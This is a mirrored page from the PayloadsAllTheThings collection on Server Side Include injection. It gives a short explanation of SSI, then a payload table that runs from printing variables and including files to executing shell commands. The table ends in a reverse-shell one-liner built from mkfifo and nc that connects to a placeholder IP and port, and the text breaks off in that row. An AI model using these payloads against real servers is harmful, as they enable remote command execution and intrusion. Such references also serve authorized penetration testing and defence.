mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
994 B
994 B
Server Side Include Injection
Server Side Includes (SSI) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.
Summary
Payloads
Description | Payload |
---|---|
Print a date | <!--#echo var="DATE_LOCAL" --> |
Print all the variables | <!--#printenv --> |
Include a file | <!--#include file="includefile.html" --> |
Execute commands | <!--#exec cmd="ls" --> |
Doing a reverse shell | `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo |